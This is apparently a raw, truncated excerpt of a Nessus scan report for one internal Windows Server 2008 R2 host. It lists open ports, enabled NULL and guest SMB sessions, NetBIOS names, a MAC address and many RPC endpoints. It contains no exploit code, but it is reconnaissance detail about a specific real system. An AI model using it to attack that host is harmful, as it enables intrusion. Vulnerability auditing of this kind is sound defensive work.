Nessus has to fall back to perform a patch audit through the registry which may lead to false positives (especially when using third-party patch auditing tools) or to false negatives (not all patches can be detected through the registry). +smb_scan_not_admin.nasl +2013/01/07 +Nessus Windows Scan Not Performed with Admin Privileges +2007/03/12 +local +None +$Revision: 1.11 $ +Reconfigure your scanner to use credentials with administrative privileges. +The Nessus scan of this host may be incomplete due to insufficient privileges provided. + +It was not possible to connect to '\\QA3APP06\ADMIN$' with the supplied credentials. + + + +It was not possible to connect to PIPE\winreg on the remote host. + +If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied credentials. +smb_registry_fail.nasl +2011/03/27 +Microsoft Windows SMB Registry : Nessus Cannot Access the Windows Registry +2007/10/04 +local +None +$Revision: 1.10 $ +n/a +Nessus is not able to access the remote Windows Registry. +Could not connect to the registry because: +Could not connect to \winreg + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 3389/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 445/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 80/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 135/tcp was found to be open + + +This plugin is a SYN 'half-open' port scanner. +It shall be reasonably quick even against a firewalled target. + +Note that SYN scanners are less intrusive than TCP (full connect) scanners against broken services, but they might kill lame misconfigured firewalls. They might also leave unclosed connections on the remote target, if the network is loaded. +nessus_syn_scanner.nbin +2011/04/05 +Nessus SYN scanner +remote +None +$Revision: 1.14 $ +Protect your target with an IP filter. +It is possible to determine which TCP ports are open. +Port 139/tcp was found to be open + + +The remote host is running Microsoft Windows operating system or Samba, a CIFS/SMB server for Unix. It was possible to log into it using one of the following accounts : + +- NULL session +- Guest account +- Given Credentials +true +true +Exploits are available +smb_login.nasl +Microsoft Windows Authenticated User Code Execution +2013/04/23 +Microsoft Windows SMB Log In Possible +2000/05/09 +remote +None +$Revision: 1.136 $ +http://support.microsoft.com/kb/143474 +http://support.microsoft.com/kb/246261 +n/a +It is possible to log into the remote host. +1999/01/01 +- NULL sessions are enabled on the remote host + + + +It is possible to get the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445. +smb_nativelanman.nasl +2013/06/25 +Microsoft Windows SMB NativeLanManager Remote System Information Disclosure +2001/10/17 +remote +None +$Revision: 1.40 $ +n/a +It is possible to obtain information about the remote operating system. +The remote Operating System is : Windows Server 2008 R2 Standard 7601 Service Pack 1 +The remote native lan manager is : Windows Server 2008 R2 Standard 6.1 +The remote SMB Domain Name is : RB + + + +The remote host listens on UDP port 137 or TCP port 445 and replies to NetBIOS nbtscan or SMB requests. + +Note that this plugin gathers information to be used in other plugins but does not itself generate a report. +netbios_name_get.nasl +2013/01/16 +Windows NetBIOS / SMB Remote Host Information Disclosure +1999/10/12 +remote +None +$Revision: 1.77 $ +n/a +It is possible to obtain the network name of the remote host. +The following 3 NetBIOS names have been gathered : + + QA3APP06 = Computer name + RB = Workgroup / Domain name + QA3APP06 = File Server Service + +The remote host has the following MAC address on its adapter : + + 00:50:56:81:01:df + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49152 : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49152 +IP : 10.31.112.26 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49153 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.26 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.26 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.26 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +TCP Port : 49153 +IP : 10.31.112.26 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49177 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +TCP Port : 49177 +IP : 10.31.112.26 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49254 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0 +Description : Unknown RPC service +Annotation : Remote Fw APIs +Type : Remote RPC service +TCP Port : 49254 +IP : 10.31.112.26 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Remote RPC service +TCP Port : 49254 +IP : 10.31.112.26 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49253 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49253 +IP : 10.31.112.26 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49154 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.26 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.26 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.26 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.26 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.26 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.26 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available remotely : + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP06 + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \pipe\lsass +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \PIPE\protected_storage +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Remote RPC service +Named pipe : \PIPE\W32TIME_ALT +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP06 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP06 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP06 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP06 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available locally : + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E360 + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E360 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 3bdb59a0-d736-4d44-9074-c1ee00000001 +UUID : 24019106-a203-4642-b88d-82dae9158929, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : LRPC-61346372017f991bb6 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000001 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc03A03B1 + +Object UUID : 6d726574-7273-0076-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : LRPC-5080a2754414a9c511 + +Object UUID : 4c8eb3ac-8634-45bf-8c32-c89c6fdf0cd0 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-10989fbb1b6e326921 + +Object UUID : 87ea16e1-0063-40d3-9067-e335854bb163 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-10989fbb1b6e326921 + +Object UUID : 4b95fe8a-3132-4a8a-8db5-f4e8058fc724 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-10989fbb1b6e326921 + +Object UUID : 7a988cee-4a47-49e0-a258-315eb8c71f8d +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-10989fbb1b6e326921 + +Object UUID : 5b53d1a7-4fbc-407e-9b35-78ae789b601d +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : OLE8EB665BB6237475DA7D71A4E4964 + +Object UUID : 5b53d1a7-4fbc-407e-9b35-78ae789b601d +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-c06f80c64d03bab8d0 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Local RPC service +Named pipe : LRPC-f40726f44c3e1b664b + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LRPC-5c2e82686803aba3f0 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : audit + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : securityevent + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LSARPC_ENDPOINT + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsapolicylookup + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsasspirpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : protected_storage + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : dsrole + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : samss lpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0 +Description : Unknown RPC service +Annotation : Spooler base remote object endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0 +Description : Unknown RPC service +Annotation : Base Firewall Engine API +Type : Local RPC service +Named pipe : LRPC-ec8effc92f8dde825d + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-ec8effc92f8dde825d + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-ec8effc92f8dde825d + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : OLEBECB3352473D4115814A43F736EE + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : LRPC-41f9a524c2b8e6c2bb + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : OLEBECB3352473D4115814A43F736EE + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : LRPC-41f9a524c2b8e6c2bb + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : W32TIME_ALT + +Object UUID : 666f7270-6c69-7365-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 6c637067-6569-746e-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601 +UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLE92E5521E40FA40F59BD9C9B08B00 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE92E5521E40FA40F59BD9C9B08B00 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE92E5521E40FA40F59BD9C9B08B00 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE92E5521E40FA40F59BD9C9B08B00 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLE92E5521E40FA40F59BD9C9B08B00 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 